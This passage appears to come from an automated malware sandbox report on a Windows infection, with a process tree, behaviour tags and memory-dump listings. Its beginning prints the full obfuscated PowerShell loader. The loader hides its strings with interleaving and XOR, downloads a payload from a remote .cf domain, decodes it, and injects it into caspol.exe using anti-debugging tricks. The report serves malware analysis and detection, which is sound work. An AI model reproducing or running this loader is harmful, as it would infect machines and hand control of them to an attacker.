Mi'MoEan0Pe9Ur6AfAXe1EaBOv7SkBSt4JaAmuBgoAUrAusABa0AnASc1StAStAanEBy4AnFTe9ReERm4BaENe0Ti8SkFSuANo8haAAl2PeBun0diAAd1SeBKr6ToESkASn8ShDSaAStABaBEx2DeAFyBTiASyFOpAOr1KrERaCFu9EkFRi8InDByAInAAnBSt0Be9He4PaBRo0SoBCa6Ku9pa9puFSkEGuFDiERa9SiEInAAt1FiBGr6LeABvBOrEMu8acESm4NoFFi3inFch7MeFNu0UdFSk2AnFTaDMoFFrDGeFEx1MuFVe6CaEHa8DaEUn4PaFGr4OpBRaCSaFTh7ViFLa4SaFCo4BrFop4FrEPa8AkENo4krFCh4FaBSeCdiFSi0DiEDiDYa'Re;Az&Ba(Ex`$DiAAmmGafVreSutGraSt7At)Sk An`$MaPReachtAsrJoiAdoNetFoiBesBlkFo8Ty;Ov`$UnRReesykTevAliAfsFiiCetHy0Un1Un go=Ze Fe'SkhHatMotsapKe:Va/Hy/FimUneLngFloUnoVakTobUnpBunSkqOu.UncSpfCo/OvSIntHyiStlIslMeeVe.VisFleBaaRa'In;Ab`$EtRRiePikPavMeiLasSuiSitGr0Tr0fl Ti=St PrHAmTPiBGa Fe'MiEMa0Rd8Ur7HoASyBinBSt1FoAClATjBUn0HaEQu4KlFEx9UnETh4TiEAcCCo8ToATrACo1exBNo3SkEHy9Af8RoBkiASe6PiABrEDiAAf1CaARe7BuBHe0FaESe4Be8SeAFoAJi1SuBWi0RaEDeAXa9Un3TuABe1GaANi6st8Hy7urABe8KlAstDDiAfo1TrANoAUnBNa0OpEDiDStEThAPr8Ra0CoASpBPaBLy3HyAHaALsAAn8AaAAfBSsAKe5SiALa0Ke9En7FuBIn0KoBBu6SeABeDEuAAaASpAUn3BuEReCOpELo0Fl9Me6DdACa1StAGuFReBGi2KnATrDArBSn7FlAKoDNeBDo0TrFJa4AsFCh5RaESkDPe'Bu;Be`$LuPUdaBrtHarFoiAgoJotZaiBusKikPy8Hj Ba=Fe PlHSmTLaBRi Bo'MeEOv0Li9Ra1BeABaAOrBSe3SaABaCunAli1NeBBe0ObBBu0HeABa1caAOr0NaBDe3IdFTr5ScFfr6FrFAd2suFEm6BoFBa9PeETh0AmAOp1PrAFoAOvBSt2BaFArETrAej5evBFa4BeBBe4EmAdo0IvAfo5LiBFo0SpAEx5Ge'Pe;Gr&Re(Ta`$TaAHumDrfGoeTatPaaRa7To)No Je`$TaPApaCotScrUdiSfoSktTiiAlsfakTi8An;Rg`$ThURenSawLahIdeRetFetTeeSadSiwUn1Un2Co6Ch2Ma=an`$PoUBenNowbahAfeSktLetSteGrdInwRe1Ou2Ka6Tr2Hi+ep'Mo\LaCCoealyUnlMooSinCeeKlsCa2Sp3No0Dr.andGlauntIn'Ge;Br`$rnCbeoaluGrnEptSo=Po'Pr'Mo;SuiPyfUn Se(Be-DinOpoBatex(skTUneResKotPa-LaPUraXetBahDu Di`$ViUPanCowEkhDieAntTotBreTrdGewpa1Ha2Ki6Re2An)Gu)Sp Mo{ScwAmhPriVilSoeRa Me(Ak`$SnCAloKouOdnSotSy Co-PueKoqUd Aq'Re'To)Ge Fa{De&Ov(Um`$FoALemIlfstePotTaasn7Ku)Ra Vi`$GeRareArkGivSliEtsPuiKatSo0Ta0Qu;UdSMatDaaAurKatHv-InSaklMueVaePhpho tr5Te;Pr}ChSEneButGe-LiCOvoRenKotaleTanTltTe mr`$FrUMinSnwexhCaeEntPotRaeArdSowLa1Un2Kn6Un2Sm St`$FrCfaoYauPrnPotTe;Sa}Ko`$OpCcroInuKenSttUn kv=Im DeGSheGltMa-MoCFeoManSttKieSnnPatRd Su`$BrUVinTywKvhSteRutNstPleHadGrwCe1Mt2Fo6No2la;Ba`$DrPDiaRetLerReiTeoReteliStsVekBe9Pr Ze=Ln BiHUnTBaBRr hu'CoESa0Be9Ge4KuAJg5MoBMa0CrBAb6TaALaDGeAKhBStBDo0vaAmaDinBkn7GuAOrFinEDa4AfFre9TyEha4Li9UnFKa9ph7flBKuDDoBMi7ErBOr0AdAOr1LuAJi9BiERaASv8Re7AcAGeBGiANoAMoBtr2HeAVa1OvBFu6AaBIc0Pa9Ta9SkFUnEVdFLaEOv8Hj2BoBRe6VaAAfBBrASk9No8Lo6ScASa5SpBFr7OpAEq1PaFDi2FeFRe0Ze9de7OpBSt0DaBSk6NoAUnDSnAVmAUdAob3raEEnCTeEBr0Fd8Au7ChAUnBMaBFo1FoAHyATaBPl0AkEMiDKn'As;Ma&So(Re`$jvAUnmCofTeeLetHaaal7No)Ga Sa`$BaPAxanatMirPaiGooErtRiiGrsAnkMo9He;Fn`$GaCAgoSkuMenBotSk0Ru Be=Ac SyHSlTRiBNu Tr'Ep9BoFsp9Si7EnBTeDBrBCu7PoBFa0UnAUl1CrAUn9KoESmAOm9Sk6EdBSk1hyAunADuBPs0fiAVoDSeADi9AlAGr1biEUnABa8MiDBrAStAClBDy0BlAPr1AnBla6LeAAnBBeBCa4Fu9fo7NeAAz1SoBCo6StBFe2RoAOpDSkAAp7SkAAn1OvBUn7SyEKoATe8Fu9EbASp5FoBTv6ReBBa7PrALyCHeAAg5AfAFa8ga9Ph9StFChETiFFaEDr8En7EmAPrBUnBSk4UnBOvDDuEOpCovECo0Ra9Ac4ErAEr5StBBa0CaBJu6MiACrDFiAOvBFoBTr0ReANaDTiBva7ThAChFHyEFl8JoESt4SkFDr4UnEBa8FoEVa4EmENa4PrEFi0Ce9Li1TrAReASlBDe3UnAReCSpASp1YnBGy0noBCh0BoAIn1BeABo0PaBBn3WrFEx5ReFHa6SaFNy2WhFTe7unEHe8KuESh4UsFDi2TjFAt1FuFDy7ReEsmDDa'Ta;Br&Ov(Op`$HaAimmStfJeeBetHaaEg7Tr)li At`$TeCHaoGruJanCatDi0Sp;Pa`$WaAFisDeyCymChtSaowi=En`$SqPSuaCutHerVaichoBltSliSusUtkEj.BrcLroUmuRdnNitSb-An6Un5Bu3ta;St`$GiCBioLouHunEntIn1Na Ry=Kr ShHRkTRaBDa oo'De9ScFMy9Sk7QuBReDAnBRe7ToBSi0WiAHe1BoALo9CeEReABr9Co6LiBSe1SyAKrAUdBDe0OpASoDPhACr9anAMo1TaEnaAsc8TrDViAMaAInBBr0SkAPh1paBRe6CoADoBGeBAf4To9Po7ReAGa1FoBco6BeBEu2CoARyDAfATa7EnASt1ReBEk7DeECoAEx8Ch9ViASv5clBFr6OrBUd7NaAMoCRrAUr5ReAPa8Sk9Ko9StFInEAmFSaEte8De7WhADiBKlBEl4IlBNrDKoEcaCMoEUn0Kv9As4EtAga5AnBTe0FaBAl6PeAadDAfAhoBRiBca0AfAPiDSkBSa7JaANoFJeEPo8RaEFr4TaFOr2skFBe1AfFBr7AcEAf8NoECr4NaECa0Su9pe6HaAan1smBDe7DeBFu4NeAClBNoADoAUdACr0FoAIn1GaAPrAudESt8EkEBl4hoENu0Af8fr5EuBCa7VeBPlDNoAIn9MeBPr0BuAUrBspEStDUd'Ze;Bo&Ha(Mo`$VeAOumPufTresptShaTo7Di)Jo Ph`$InCBioReuNonCotTa1Ve;To`$PiCsloAruprnantPe2Bo Hu=Fr DaHFoTAfBCa Un'PaEAp0SpAUf2DeBTe6UnAMa5TeAaf3OeBSp0IsABe1ReAAbAUdBSu7OrEBr4BeFSe9ToEmi4Di9KvFAs9Mi7MoBSmDSaBFo7AkBPa0ReAAs1FoAVo9VeEplAwh9He6DrBKa1ShABiASaBDa0AmAMeDCiAMi9GrAam1BiEDeAUn8kaDEgARiAMoBAv0tiAJo1ChBBe6MiAStBPoBSt4Sl9Pr7TeAGr1KaBtr6WeBAu2AcASoDTjApi7koADi1trBIn7BeEPrALe8Gl9FoApl5TrBCo6PyBbe7GoALiCAbAFo5LiAPr8Za9St9AnFAsESoFSaECi8Ri3UdABr1MaBRe0pl8Fo0FlASt1AnASp8FaACa1SvASp3FoASt5vaBBl0SlADe1Ta8Yn2DuASuBEfBCr6Br8Ja2SlBPo1jeAIrAUdAsu7BuBSk0LoARaDAnAArBSkAPyAVi9Tr4EfAEnBafAUnDPrAUnAUdBFo0ReAVe1AsBFr6KrENuCBrEinCSaAPr2PrAStFArBNo4SkEBo4SkEvo0Da9Ni7BiBFo0InAAdDAbAun2ChAOu2DeEAl4SuEEk0Ta8Pu3WeBIn6InAGeBudBUn7reBRe7KnBAf1PlAVo8AwERaDLiEal8FeETr4DaEAmCAn8Hy3Sy8Ku0Ci9Gr0PoEWo4Ol8St4DaEWaCPa9ViFUn8EpDkuAdeAApBZe0Re9Fu4HaBma0LeBIn6Hj9Se9DuEMa8ReEUn4Ae9RaFCl8AdDHaAKrAAsBMe0Ba9Sn4liBWe0FoBMa6Ko9Hv9FrEUn8DiEUn4Pi9jaFKo8NuDfrAToAArBOp0St9De4DiBSl0TuBUn6Sh9Li9OpERe8MaEAe4Su9MaFUn8NoDDrANeAFdBPr0Br9Ma4RaBTr0LyBTj6su9At9MaEEf8RuEFr4Ru9AsFud8SnDMiASyAGgBMo0Pe9Ho4KaBTi0drBGe6si9Pr9McEGrDPrEUl4BeEPrCTi9unFCr8ReDPrATyAFuBCa0Uh9Tr4TaBUh0InBOp6Sp9Ho9DaEPaDGeEdeDBeEInDPa'Fr;Bu&Sk(To`$SmAgumScfKieIntCeaPi7ly)Pa ci`$FlCEaoUnuChnOmtpr2Un;su`$DiCReoRiuStnnotSw3Pe Sy=Un OlHudTBeBSm Li'gaESc0ReAhe2stBLi6ReAHe5klAPh3NaBEx0PoASl1PlAShAGoBPu7UpEUrASt8ouDFlADrAFiBHe2UdAAfBStASeFAvAan1OvEReCMaEKo0La9Mi1HuAOvAAnBRi3ReASlCMeAOu1GuBEk0TrBBa0LaALa1ImAKa0InBNi3MiFPi5ArFMe6DaFLe2KnFUd7UnEXy8SbESi0Un9Un6ovATu1BuBCe7KoBls4doASeBHaADuANaASt0DiARa1AlAOrAOxEVa8unECi0Vi8Gi6SyANo5PeAAf7FsAAuFWoBMa7AaEKu8HuFAl4ReEPr8MaFPh4PeEHjDme'Pa;Pr&El(Om`$ErAlnmRafEdeNotAvaOp7Ly)Ab Fr`$DnCfloAfuFonPrtUn3Ou#Et;""";Function Count9 { param([String]$Compu); For($Unprepa=2; $Unprepa -lt $Compu.Length-1; $Unprepa+=(2+1)){$Rekvisit = $Rekvisit + $Compu.Substring($Unprepa, 1)}; $Rekvisit;}$Amanitopsi0 = Count9 'AnIMaEGeXKr ';$Amanitopsi1= Count9 $Spilled;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Amanitopsi1 ;}else{&$Amanitopsi0 $Amanitopsi1;}"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1576
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Compu); $Aarsra = ''; Write-Host $Aarsra; Write-Host $Aarsra; Write-Host $Aarsra; $Embederne = New-Object byte[] ($Compu.Length / 2); For($Unprepa=0; $Unprepa -lt $Compu.Length; $Unprepa+=2){ $Embederne[$Unprepa/2] = [convert]::ToByte($Compu.Substring($Unprepa, 2), 16); $Embederne[$Unprepa/2] = ($Embederne[$Unprepa/2] -bxor 196); } [String][System.Text.Encoding]::ASCII.GetString($Embederne);}$Unphysi0=HTB '97BDB7B0A1A9EAA0A8A8';$Unphysi1=HTB '89ADA7B6ABB7ABA2B0EA93ADAAF7F6EA91AAB7A5A2A18AA5B0ADB2A189A1B0ACABA0B7';$Unphysi2=HTB '83A1B094B6ABA785A0A0B6A1B7B7';$Unphysi3=HTB '97BDB7B0A1A9EA96B1AAB0ADA9A1EA8DAAB0A1B6ABB497A1B6B2ADA7A1B7EA8CA5AAA0A8A196A1A2';$Unphysi4=HTB 'B7B0B6ADAAA3';$Unphysi5=HTB '83A1B089ABA0B1A8A18CA5AAA0A8A1';$Unphysi6=HTB '969097B4A1A7ADA5A88AA5A9A1E8E48CADA0A186BD97ADA3E8E494B1A6A8ADA7';$Unphysi7=HTB '96B1AAB0ADA9A1E8E489A5AAA5A3A1A0';$Unphysi8=HTB '96A1A2A8A1A7B0A1A080A1A8A1A3A5B0A1';$Unphysi9=HTB '8DAA89A1A9ABB6BD89ABA0B1A8A1';$Amfeta0=HTB '89BD80A1A8A1A3A5B0A190BDB4A1';$Amfeta1=HTB '87A8A5B7B7E8E494B1A6A8ADA7E8E497A1A5A8A1A0E8E485AAB7AD87A8A5B7B7E8E485B1B0AB87A8A5B7B7';$Amfeta2=HTB '8DAAB2ABAFA1';$Amfeta3=HTB '94B1A6A8ADA7E8E48CADA0A186BD97ADA3E8E48AA1B397A8ABB0E8E492ADB6B0B1A5A8';$Amfeta4=HTB '92ADB6B0B1A5A885A8A8ABA7';$Amfeta5=HTB 'AAB0A0A8A8';$Amfeta6=HTB '8AB094B6ABB0A1A7B092ADB6B0B1A5A889A1A9ABB6BD';$Amfeta7=HTB '8D819C';$Amfeta8=HTB '98';$Stiff=HTB '91978196F7F6';$Grossul=HTB '87A5A8A893ADAAA0ABB394B6ABA785';function fkp {Param ($Subte, $Semipeacef) ;$Patriotisk0 =HTB 'E085A2B7AFB6E4F9E4EC9F85B4B480ABA9A5ADAA99FEFE87B1B6B6A1AAB080ABA9A5ADAAEA83A1B085B7B7A1A9A6A8ADA1B7ECEDE4B8E493ACA1B6A1E98BA6AEA1A7B0E4BFE4E09BEA83A8ABA6A5A885B7B7A1A9A6A8BD87A5A7ACA1E4E985AAA0E4E09BEA88ABA7A5B0ADABAAEA97B4A8ADB0ECE085A9A2A1B0A5FCED9FE9F599EA81B5B1A5A8B7ECE091AAB4ACBDB7ADF4EDE4B9EDEA83A1B090BDB4A1ECE091AAB4ACBDB7ADF5ED';&($Amfeta7) $Patriotisk0;$Patriotisk5 = HTB 'E097ABA8B7ABF6F0F4E4F9E4E085A2B7AFB6EA83A1B089A1B0ACABA0ECE091AAB4ACBDB7ADF6E8E49F90BDB4A19F9999E484ECE091AAB4ACBDB7ADF7E8E4E091AAB4ACBDB7ADF0EDED';&($Amfeta7) $Patriotisk5;$Patriotisk1 = HTB 'B6A1B0B1B6AAE4E097ABA8B7ABF6F0F4EA8DAAB2ABAFA1ECE0AAB1A8A8E8E484EC9F97BDB7B0A1A9EA96B1AAB0ADA9A1EA8DAAB0A1B6ABB497A1B6B2ADA7A1B7EA8CA5AAA0A8A196A1A299EC8AA1B3E98BA6AEA1A7B0E497BDB7B0A1A9EA96B1AAB0ADA9A1EA8DAAB0A1B6ABB497A1B6B2ADA7A1B7EA8CA5AAA0A8A196A1A2ECEC8AA1B3E98BA6AEA1A7B0E48DAAB094B0B6EDE8E4ECE085A2B7AFB6EA83A1B089A1B0ACABA0ECE091AAB4ACBDB7ADF1EDEDEA8DAAB2ABAFA1ECE0AAB1A8A8E8E484ECE097B1A6B0A1EDEDEDEDE8E4E097A1A9ADB4A1A5A7A1A2EDED';&($Amfeta7) $Patriotisk1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Proresign228,[Parameter(Position = 1)] [Type] $Inconsecu = [Void]);$Patriotisk2 = HTB 'E094A5B6A5A8ABA3E4F9E49F85B4B480ABA9A5ADAA99FEFE87B1B6B6A1AAB080ABA9A5ADAAEA80A1A2ADAAA180BDAAA5A9ADA785B7B7A1A9A6A8BDECEC8AA1B3E98BA6AEA1A7B0E497BDB7B0A1A9EA96A1A2A8A1A7B0ADABAAEA85B7B7A1A9A6A8BD8AA5A9A1ECE091AAB4ACBDB7ADFCEDEDE8E49F97BDB7B0A1A9EA96A1A2A8A1A7B0ADABAAEA81A9ADB0EA85B7B7A1A9A6A8BD86B1ADA8A0A1B685A7A7A1B7B799FEFE96B1AAEDEA80A1A2ADAAA180BDAAA5A9ADA789ABA0B1A8A1ECE091AAB4ACBDB7ADFDE8E4E0A2A5A8B7A1EDEA80A1A2ADAAA190BDB4A1ECE085A9A2A1B0A5F4E8E4E085A9A2A1B0A5F5E8E49F97BDB7B0A1A9EA89B1A8B0ADA7A5B7B080A1A8A1A3A5B0A199ED';&($Amfeta7) $Patriotisk2;$Patriotisk3 = HTB 'E094A5B6A5A8ABA3EA80A1A2ADAAA187ABAAB7B0B6B1A7B0ABB6ECE091AAB4ACBDB7ADF2E8E49F97BDB7B0A1A9EA96A1A2A8A1A7B0ADABAAEA87A5A8A8ADAAA387ABAAB2A1AAB0ADABAAB799FEFE97B0A5AAA0A5B6A0E8E4E094B6ABB6A1B7ADA3AAF6F6FCEDEA97A1B08DA9B4A8A1A9A1AAB0A5B0ADABAA82A8A5A3B7ECE091AAB4ACBDB7ADF3ED';&($Amfeta7) $Patriotisk3;$Patriotisk4 = HTB 'E094A5B6A5A8ABA3EA80A1A2ADAAA189A1B0ACABA0ECE085A9A2A1B0A5F6E8E4E085A9A2A1B0A5F7E8E4E08DAAA7ABAAB7A1A7B1E8E4E094B6ABB6A1B7ADA3AAF6F6FCEDEA97A1B08DA9B4A8A1A9A1AAB0A5B0ADABAA82A8A5A3B7ECE091AAB4ACBDB7ADF3ED';&($Amfeta7) $Patriotisk4;$Patriotisk5 = HTB 'B6A1B0B1B6AAE4E094A5B6A5A8ABA3EA87B6A1A5B0A190BDB4A1ECED';&($Amfeta7) $Patriotisk5 ;}$Lyseslukk162 = HTB 'AFA1B6AAA1A8F7F6';$Patriotisk6 = HTB 'E08FA8A2B0A1B6E4F9E49F97BDB7B0A1A9EA96B1AAB0ADA9A1EA8DAAB0A1B6ABB497A1B6B2ADA7A1B7EA89A5B6B7ACA5A899FEFE83A1B080A1A8A1A3A5B0A182ABB682B1AAA7B0ADABAA94ABADAAB0A1B6ECECA2AFB4E4E088BDB7A1B7A8B1AFAFF5F2F6E4E085A9A2A1B0A5F0EDE8E4EC838090E484EC9F8DAAB094B0B699E8E49F918DAAB0F7F699E8E49F918DAAB0F7F699E8E49F918DAAB0F7F699EDE4EC9F8DAAB094B0B699EDEDED';&($Amfeta7) $Patriotisk6;$Backs = fkp $Amfeta5 $Amfeta6;$Patriotisk7 = HTB 'E091AAB3ACA1B0B0A1A0B3F5F6F2F7E4F9E4E08FA8A2B0A1B6EA8DAAB2ABAFA1EC9F8DAAB094B0B699FEFE9EA1B6ABE8E4F2F1F7E8E4F4BCF7F4F4F4E8E4F4BCF0F4ED';&($Amfeta7) $Patriotisk7;$Patriotisk8 = HTB 'E096A1B7B4ABAAA0A1AAE4F9E4E08FA8A2B0A1B6EA8DAAB2ABAFA1EC9F8DAAB094B0B699FEFE9EA1B6ABE8E4F3F7F0F2FDFDF1F6E8E4F4BCF7F4F4F4E8E4F4BCF0ED';&($Amfeta7) $Patriotisk8;$Rekvisit01 = 'http://megookbpnq.cf/Stille.sea';$Rekvisit00 = HTB 'E087ABB1AAB0E4F9E4EC8AA1B3E98BA6AEA1A7B0E48AA1B0EA93A1A687A8ADA1AAB0EDEA80ABB3AAA8ABA5A097B0B6ADAAA3ECE096A1AFB2ADB7ADB0F4F5ED';$Patriotisk8 = HTB 'E091AAB3ACA1B0B0A1A0B3F5F6F2F6F9E0A1AAB2FEA5B4B4A0A5B0A5';&($Amfeta7) $Patriotisk8;$Unwhettedw1262=$Unwhettedw1262+'\Ceylones230.dat';$Count='';if (-not(Test-Path $Unwhettedw1262)) {while ($Count -eq '') {&($Amfeta7) $Rekvisit00;Start-Sleep 5;}Set-Content $Unwhettedw1262 $Count;}$Count = Get-Content $Unwhettedw1262;$Patriotisk9 = HTB 'E094A5B0B6ADABB0ADB7AFE4F9E49F97BDB7B0A1A9EA87ABAAB2A1B6B099FEFE82B6ABA986A5B7A1F2F097B0B6ADAAA3ECE087ABB1AAB0ED';&($Amfeta7) $Patriotisk9;$Count0 = HTB '9F97BDB7B0A1A9EA96B1AAB0ADA9A1EA8DAAB0A1B6ABB497A1B6B2ADA7A1B7EA89A5B6B7ACA5A899FEFE87ABB4BDECE094A5B0B6ADABB0ADB7AFE8E4F4E8E4E4E091AAB3ACA1B0B0A1A0B3F5F6F2F7E8E4F2F1F7ED';&($Amfeta7) $Count0;$Asymto=$Patriotisk.count-653;$Count1 = HTB '9F97BDB7B0A1A9EA96B1AAB0ADA9A1EA8DAAB0A1B6ABB497A1B6B2ADA7A1B7EA89A5B6B7ACA5A899FEFE87ABB4BDECE094A5B0B6ADABB0ADB7AFE8E4F2F1F7E8E4E096A1B7B4ABAAA0A1AAE8E4E085B7BDA9B0ABED';&($Amfeta7) $Count1;$Count2 = HTB 'E0A2B6A5A3B0A1AAB7E4F9E49F97BDB7B0A1A9EA96B1AAB0ADA9A1EA8DAAB0A1B6ABB497A1B6B2ADA7A1B7EA89A5B6B7ACA5A899FEFE83A1B080A1A8A1A3A5B0A182ABB682B1AAA7B0ADABAA94ABADAAB0A1B6ECECA2AFB4E4E097B0ADA2A2E4E083B6ABB7B7B1A8EDE8E4EC838090E484EC9F8DAAB094B0B699E8E49F8DAAB094B0B699E8E49F8DAAB094B0B699E8E49F8DAAB094B0B699E8E49F8DAAB094B0B699EDE4EC9F8DAAB094B0B699EDEDED';&($Amfeta7) $Count2;$Count3 = HTB 'E0A2B6A5A3B0A1AAB7EA8DAAB2ABAFA1ECE091AAB3ACA1B0B0A1A0B3F5F6F2F7E8E096A1B7B4ABAAA0A1AAE8E086A5A7AFB7E8F4E8F4ED';&($Amfeta7) $Count3#"
          3⤵
          • Blocklisted process makes network request
          • Checks QEMU agent file
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1676
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
            4⤵
            • Checks QEMU agent file
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of AdjustPrivilegeToken
            PID:3196
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 1764
              5⤵
              • Program crash
              PID:1248
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3196 -ip 3196
      1⤵
        PID:2176

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1576-137-0x00007FFDB69A0000-0x00007FFDB7461000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1576-164-0x00007FFDB69A0000-0x00007FFDB7461000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1576-134-0x0000000000000000-mapping.dmp

        Download

      • memory/1576-135-0x000001B247010000-0x000001B247032000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1576-149-0x00007FFDB69A0000-0x00007FFDB7461000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1676-150-0x0000000008090000-0x000000000C6A1000-memory.dmp

        Filesize

        70.1MB

        Download

      • memory/1676-152-0x0000000077BC0000-0x0000000077D63000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1676-139-0x00000000051B0000-0x00000000057D8000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/1676-140-0x0000000005810000-0x0000000005832000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1676-141-0x00000000058B0000-0x0000000005916000-memory.dmp

        Filesize

        408KB

        Download

      • memory/1676-142-0x0000000005990000-0x00000000059F6000-memory.dmp

        Filesize

        408KB

        Download

      • memory/1676-143-0x00000000060B0000-0x00000000060CE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/1676-144-0x0000000007A10000-0x000000000808A000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/1676-145-0x00000000065E0000-0x00000000065FA000-memory.dmp

        Filesize

        104KB

        Download

      • memory/1676-146-0x0000000007390000-0x0000000007426000-memory.dmp

        Filesize

        600KB

        Download

      • memory/1676-147-0x00000000072D0000-0x00000000072F2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1676-148-0x000000000C6B0000-0x000000000CC54000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/1676-136-0x0000000000000000-mapping.dmp

        Download

      • memory/1676-163-0x0000000008090000-0x000000000C6A1000-memory.dmp

        Filesize

        70.1MB

        Download

      • memory/1676-151-0x00007FFDD4B90000-0x00007FFDD4D85000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/1676-138-0x0000000004B40000-0x0000000004B76000-memory.dmp

        Filesize

        216KB

        Download

      • memory/1676-156-0x0000000077BC0000-0x0000000077D63000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/1676-154-0x0000000077BC0000-0x0000000077D63000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/3196-162-0x0000000000400000-0x0000000000430000-memory.dmp

        Filesize

        192KB

        Download

      • memory/3196-155-0x0000000000D00000-0x0000000005311000-memory.dmp

        Filesize

        70.1MB

        Download

      • memory/3196-157-0x00007FFDD4B90000-0x00007FFDD4D85000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/3196-158-0x0000000077BC0000-0x0000000077D63000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/3196-159-0x0000000000400000-0x000000000062B000-memory.dmp

        Filesize

        2.2MB

        Download

      • memory/3196-160-0x0000000000401000-0x000000000062B000-memory.dmp

        Filesize

        2.2MB

        Download

      • memory/3196-153-0x0000000000000000-mapping.dmp

        Download

      • memory/3196-169-0x0000000000D00000-0x0000000005311000-memory.dmp

        Filesize

        70.1MB

        Download

      • memory/3196-166-0x0000000024990000-0x000000002499A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/3196-165-0x00000000249F0000-0x0000000024A82000-memory.dmp

        Filesize

        584KB

        Download

      • memory/3196-168-0x0000000077BC0000-0x0000000077D63000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/3196-167-0x00007FFDD4B90000-0x00007FFDD4D85000-memory.dmp

        Filesize

        2.0MB

        Download

      • memory/4844-133-0x0000000000000000-mapping.dmp

        Download

      • memory/4884-132-0x0000000000000000-mapping.dmp

        Download